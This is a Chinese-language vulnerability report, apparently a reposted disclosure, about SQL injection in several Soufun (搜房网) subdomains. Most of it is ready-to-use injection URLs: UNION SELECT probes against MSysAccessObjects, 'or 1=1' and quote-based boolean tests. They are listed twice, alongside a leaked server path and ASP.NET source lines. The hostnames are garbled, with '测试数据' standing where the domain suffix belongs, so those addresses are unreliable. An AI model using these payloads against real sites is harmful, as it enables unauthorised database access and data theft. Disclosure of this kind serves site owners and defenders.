简要描述:注射可导致主机相关信息泄露,以及进一步的渗透。望管理员及时修复,以免造成对主机安全影响。 详细说明:1、 http://njbbs.soufun测试数据/zhuanti/njxn/njxnvote.asp ?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects 2、 http://nree.soufun测试数据/2007spring/guangzhou/show2.asp ?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects 3、 http://dg.soufun测试数据/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1 4、 http://szesftest.soufun测试数据/sechouse2/products.asp ?BigClassName=%B6%FE%CA%D6%B7%BF &SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1 漏洞 证明:1、 http://njbbs.soufun测试数据/zhuanti/njxn/njxnvote. asp ?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects 2、 http://nree.soufun测试数据/2007spring/guangzhou/show2.asp ?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects 3、 http://dg.soufun测试数据/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1 4、 http://szesftest.soufun测试数据/sechouse2/products.asp ?BigClassName=%B6%FE%CA%D6%B7%BF &SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1 http://HdhCmsTestsoufun测试数据/space/Other/Posts.aspx?userid=5469987 泄露信息主机路径: Source File: e:\soufun\spacen.soufun测试数据\Other\Posts.aspx Line: 6 Line 4: <%@ MasterType VirtualPath="~/Visit.Master" %> Line 5: <asp:Content ID="TitleContent" ContentPlaceHolderID="TitleContent" runat="server"> Line 6: <%=Master.visitUser.UserName%>- 家庭空间- 搜房网 Line 7: </asp:Content> Line 8: <asp:Content ID="HeadContent" ContentPlaceHolderID="HeadContent" runat="server"> 修复方案:过滤 作者 孤狐浪子
查看更多关于搜房网多个分站存在注射漏洞及敏感信息泄露的详细内容...